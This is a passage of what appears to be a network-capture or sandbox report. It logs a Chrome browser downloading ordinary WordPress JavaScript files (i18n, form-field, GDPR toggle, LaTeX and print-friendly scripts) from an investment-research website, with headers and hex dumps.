                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 7d 7d 76 61 72 20 6f 2c 73 2c 6c 2c 75 3b 6f 3d 7b 22 28 22 3a 39 2c 22 21 22 3a 38 2c 22 2a 22 3a 37 2c 22 2f 22 3a 37 2c 22 25 22 3a 37 2c 22 2b 22 3a 36 2c 22 2d 22 3a 36 2c 22 3c 22 3a 35 2c 22 3c 3d 22 3a 35 2c 22 3e 22 3a 35 2c 22 3e 3d 22 3a 35 2c 22 3d 3d 22 3a 34 2c 22 21 3d 22 3a 34 2c 22 26 26 22 3a 33 2c 22 7c 7c 22 3a 32 2c 22 3f 22 3a 31 2c 22 3f 3a 22 3a 31 7d 2c 73 3d 5b 22 28 22 2c 22 3f 22 5d 2c 6c 3d 7b 22 29 22 3a 5b 22 28 22 5d 2c 22 3a 22 3a 5b 22 3f 22 2c 22 3f 3a 22 5d 7d 2c 75 3d 2f 3c 3d 7c 3e 3d 7c 3d 3d 7c 21 3d 7c 26 26 7c 5c 7c 5c 7c 7c 5c 3f 3a 7c 5c 28 7c 21 7c 5c 2a 7c 5c 2f 7c 25 7c 5c 2b 7c 2d 7c 3c 7c 3e 7c 5c 3f 7c 5c 29 7c 3a 2f 3b 76 61
                                                                                                                                                                                                                                                                        Data Ascii: rror: \n\n"+e.toString()),t}}var o,s,l,u;o={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":3,"||":2,"?":1,"?:":1},s=["(","?"],l={")":["("],":":["?","?:"]},u=/<=|>=|==|!=|&&|\|\||\?:|\(|!|\*|\/|%|\+|-|<|>|\?|\)|:/;va
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 20 69 6e 20 74 68 69 73 2e 64 61 74 61 3d 74 2c 74 68 69 73 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 3d 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 7b 7d 2c 66 29 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 72 5d 3d 76 6f 69 64 20 30 21 3d 3d 65 26 26 72 20 69 6e 20 65 3f 65 5b 72 5d 3a 66 5b 72 5d 7d 64 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 50 6c 75 72 61 6c 46 6f 72 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 2c 6e 2c 69 2c 61 3d 74 68 69 73 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 5b 74 5d 3b 72 65 74 75 72 6e 20 61 7c 7c 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 28 69 3d 28 72 3d 74 68 69 73 2e 64 61 74 61 5b 74
                                                                                                                                                                                                                                                                        Data Ascii: gKey:null};function d(t,e){var r;for(r in this.data=t,this.pluralForms={},this.options={},f)this.options[r]=void 0!==e&&r in e?e[r]:f[r]}d.prototype.getPluralForm=function(t,e){var r,n,i,a=this.pluralForms[t];return a||("function"!=typeof(i=(r=this.data[t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 7b 67 2e 74 65 73 74 28 74 29 26 26 61 28 29 7d 3b 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 41 64 64 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 2c 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 7d 72 65 74 75 72 6e 7b 67 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 6e 2e 64 61 74 61 5b 74 5d 2c 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 73 2c 61 64 64 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 7b 6e 2e 64 61 74 61 5b 65 5d 3d 7b 2e 2e 2e 6e 2e 64 61 74 61 5b 65 5d 2c 2e 2e 2e 74 2c 22 22 3a 7b 2e 2e 2e
                                                                                                                                                                                                                                                                        Data Ascii: ;if(t&&s(t,e),r){const t=t=>{g.test(t)&&a()};r.addAction("hookAdded","core/i18n",t),r.addAction("hookRemoved","core/i18n",t)}return{getLocaleData:(t="default")=>n.data[t],setLocaleData:s,addLocaleData:(t,e="default")=>{n.data[e]={...n.data[e],...t,"":{...
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC58INData Raw: 6c 61 74 69 6f 6e 2e 62 69 6e 64 28 62 29 7d 29 28 29 2c 28 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 29 2e 69 31 38 6e 3d 6e 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: lation.bind(b)})(),(window.wp=window.wp||{}).i18n=n})();
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        34192.168.2.449784141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC829OUTGET /wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/disable-gf-fields.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC444INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-ae"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147805
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d38e8d42de-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC180INData Raw: 61 65 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 24 28 22 2e 64 69 73 61 62 6c 65 64 20 69 6e 70 75 74 2c 20 2e 64 69 73 61 62 6c 65 64 20 74 65 78 74 61 72 65 61 22 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 27 64 69 73 61 62 6c 65 64 27 29 3b 24 28 22 2e 72 65 61 64 6f 6e 6c 79 20 69 6e 70 75 74 2c 20 2e 72 65 61 64 6f 6e 6c 79 20 74 65 78 74 61 72 65 61 22 29 2e 70 72 6f 70 28 27 72 65 61 64 6f 6e 6c 79 27 2c 27 72 65 61 64 6f 6e 6c 79 27 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: aejQuery(document).ready(function($){$(".disabled input, .disabled textarea").prop('disabled','disabled');$(".readonly input, .readonly textarea").prop('readonly','readonly')})
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        35192.168.2.449783141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC792OUTGET /wp-content/plugins/ultimate-member/assets/js/um-gdpr.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-184"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147805
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d38a008c5d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC395INData Raw: 31 38 34 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 61 2e 75 6d 2d 74 6f 67 67 6c 65 2d 67 64 70 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 74 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 22 29 2c 67 3d 74 2e 66 69 6e 64 28 22 2e 75 6d 2d 67 64 70 72 2d 63 6f 6e 74 65 6e 74 22 29 3b 67 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 3f 28 74 2e 66 69 6e 64 28 22 61 2e 75 6d 2d 74 6f 67 67 6c 65 2d 67 64 70 72 22 29 2e 74 65 78 74 28 65 2e 64 61 74 61 28 22 74 6f 67 67 6c 65 2d 73 68 6f 77 22 29 29 2c 67 2e 68 69 64 65 28 29 2e 66 69 6e 64 28 22 61 2e 75 6d 2d 74 6f 67 67 6c 65 2d 67 64
                                                                                                                                                                                                                                                                        Data Ascii: 184jQuery(document).on("click","a.um-toggle-gdpr",function(e){var e=jQuery(e.currentTarget),t=e.closest(".um-field-area"),g=t.find(".um-gdpr-content");g.is(":visible")?(t.find("a.um-toggle-gdpr").text(e.data("toggle-show")),g.hide().find("a.um-toggle-gd
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        36192.168.2.449788141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC822OUTGET /wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-18b"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147805
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d38ee85e76-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC402INData Raw: 31 38 62 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 76 61 72 20 74 65 73 74 49 6d 67 3d 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 79 4e 7a 55 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 63 31 49 6a 34 38 4c 33 4e 32 5a 7a 34 25 33 44 27 3b 76 61 72 20 69 6d 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 6d 67 27 29 0a 69 6d 67 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 73 72 63 27 2c 74 65 73 74 49 6d 67 29 3b 69 6d 67 2e 61 64
                                                                                                                                                                                                                                                                        Data Ascii: 18bjQuery(document).ready(function($){var testImg='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNzUiIGhlaWdodD0iMjc1Ij48L3N2Zz4%3D';var img=document.createElement('img')img.setAttribute('src',testImg);img.ad
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        37192.168.2.449786141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC777OUTGET /wp-content/cache/min/1/printfriendly.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-9c26"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147805
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d38f494332-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC877INData Raw: 37 64 63 35 0d 0a 76 61 72 20 63 6f 6d 6d 6f 6e 55 74 69 6c 73 3d 7b 68 61 73 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 6e 6f 64 65 2c 63 6c 61 73 73 4e 61 6d 65 29 7b 69 66 28 6e 6f 64 65 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 4e 6f 64 65 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 72 65 74 75 72 6e 21 31 7d 0a 69 66 28 6e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 29 7b 72 65 74 75 72 6e 20 6e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 63 6c 61 73 73 4e 61 6d 65 29 7d 0a 76 61 72 20 63 6c 61 73 73 4e 61 6d 65 73 3d 28 6e 6f 64 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6c 61 73 73 27 29 7c 7c 27 27 29 2e 73 70 6c 69 74 28 2f 5c 73 2f 29 3b 72 65 74 75 72 6e 20 63 6c 61 73 73 4e 61 6d 65 73 2e 69 6e 64 65 78 4f 66 28 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: 7dc5var commonUtils={hasClass:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return!1}if(node.classList){return node.classList.contains(className)}var classNames=(node.getAttribute('class')||'').split(/\s/);return classNames.indexOf(cl
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 74 49 6d 61 67 65 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 69 6d 67 2c 6f 6e 53 65 72 76 65 72 29 7b 69 66 28 69 6d 67 2e 6a 71 75 65 72 79 29 7b 69 6d 67 3d 69 6d 67 5b 30 5d 7d 0a 76 61 72 20 72 65 73 75 6c 74 3d 6e 75 6c 6c 3b 69 66 28 6f 6e 53 65 72 76 65 72 29 7b 76 61 72 20 70 66 44 61 74 61 57 69 64 74 68 3d 69 6d 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 70 66 2d 64 61 74 61 2d 77 69 64 74 68 27 29 7c 7c 69 6d 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 70 66 5f 72 65 63 74 5f 77 69 64 74 68 27 29 3b 69 66 28 70 66 44 61 74 61 57 69 64 74 68 29 7b 72 65 73 75 6c 74 3d 70 61 72 73 65 49 6e 74 28 70 66 44 61 74 61 57 69 64 74 68 2c 31 30 29 7d 7d 65 6c 73 65 20 69 66 28 69 6d 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28
                                                                                                                                                                                                                                                                        Data Ascii: tImageWidth:function(img,onServer){if(img.jquery){img=img[0]}var result=null;if(onServer){var pfDataWidth=img.getAttribute('pf-data-width')||img.getAttribute('data-pf_rect_width');if(pfDataWidth){result=parseInt(pfDataWidth,10)}}else if(img.getAttribute(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 49 54 59 3a 31 30 30 30 30 30 30 2c 67 65 74 53 76 67 49 6d 61 67 65 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 73 76 67 2c 6f 6e 53 65 72 76 65 72 29 7b 76 61 72 20 72 65 73 75 6c 74 3d 74 68 69 73 2e 67 65 74 49 6d 61 67 65 57 69 64 74 68 28 73 76 67 2c 6f 6e 53 65 72 76 65 72 29 7c 7c 74 68 69 73 2e 49 4e 46 49 4e 49 54 59 3b 76 61 72 20 6d 61 78 56 61 6c 75 65 3d 74 68 69 73 2e 73 76 67 4d 61 78 56 61 6c 75 65 28 73 76 67 29 3b 76 61 72 20 76 69 65 77 42 6f 78 56 61 6c 75 65 3d 74 68 69 73 2e 73 76 67 56 69 65 77 42 6f 78 28 73 76 67 29 2e 77 69 64 74 68 7c 7c 74 68 69 73 2e 49 4e 46 49 4e 49 54 59 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 69 6e 28 72 65 73 75 6c 74 2c 6d 61 78 56 61 6c 75 65 2c 76 69 65 77 42 6f 78 56 61 6c 75 65 29 7d 2c 67 65 74
                                                                                                                                                                                                                                                                        Data Ascii: ITY:1000000,getSvgImageWidth:function(svg,onServer){var result=this.getImageWidth(svg,onServer)||this.INFINITY;var maxValue=this.svgMaxValue(svg);var viewBoxValue=this.svgViewBox(svg).width||this.INFINITY;return Math.min(result,maxValue,viewBoxValue)},get
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 45 4d 45 4e 54 53 29 7c 7c 24 28 6e 6f 64 65 29 2e 66 69 6e 64 28 27 2a 3a 76 69 73 69 62 6c 65 27 29 2e 6c 65 6e 67 74 68 3c 3d 4d 41 4e 59 5f 45 4c 45 4d 45 4e 54 53 5f 54 48 52 45 53 48 4f 4c 44 29 29 7d 7d 29 28 29 2c 72 65 73 69 7a 65 49 6d 61 67 65 43 73 73 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 76 61 6c 75 65 29 7b 72 65 74 75 72 6e 27 70 66 2d 73 69 7a 65 2d 27 2b 76 61 6c 75 65 2e 72 65 70 6c 61 63 65 28 27 2d 73 69 7a 65 27 2c 27 27 29 2e 72 65 70 6c 61 63 65 28 27 2d 69 6d 61 67 65 73 27 2c 27 27 29 7d 2c 61 64 64 43 53 53 3a 66 75 6e 63 74 69 6f 6e 28 63 73 73 2c 64 6f 63 2c 75 73 65 42 6f 64 79 29 7b 76 61 72 20 74 61 67 4e 61 6d 65 3d 75 73 65 42 6f 64 79 3f 27 62 6f 64 79 27 3a 27 68 65 61 64 27 3b 76 61 72 20 65 6c 65 6d 65 6e 74 3d
                                                                                                                                                                                                                                                                        Data Ascii: EMENTS)||$(node).find('*:visible').length<=MANY_ELEMENTS_THRESHOLD))}})(),resizeImageCssClass:function(value){return'pf-size-'+value.replace('-size','').replace('-images','')},addCSS:function(css,doc,useBody){var tagName=useBody?'body':'head';var element=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 61 2e 63 6f 6e 66 69 67 2e 68 6f 73 74 73 2e 63 64 6e 3b 69 66 28 75 72 6c 2e 69 6e 64 65 78 4f 66 28 63 64 6e 50 72 65 66 69 78 29 3d 3d 3d 30 29 7b 72 65 74 75 72 6e 20 75 72 6c 7d 0a 72 65 74 75 72 6e 20 63 64 6e 50 72 65 66 69 78 2b 75 72 6c 7d 3b 76 61 72 20 70 65 72 73 69 73 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 73 41 6e 64 52 65 63 74 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 53 54 59 4c 45 53 5f 54 4f 5f 53 41 56 45 3d 5b 27 64 69 73 70 6c 61 79 27 2c 27 76 69 73 69 62 69 6c 69 74 79 27 5d 3b 76 61 72 20 52 45 43 54 5f 54 4f 5f 53 41 56 45 3d 5b 27 77 69 64 74 68 27 2c 27 68 65 69 67 68 74 27 5d 3b 76 61 72 20 50 52 45 46 49 58 3d 27 70 66 27 3b 66 75 6e 63 74 69 6f 6e 20 70 65 72 73 69 73 74 4f 62 6a 65 63 74 28 6e 6f 64 65 2c 6f 62
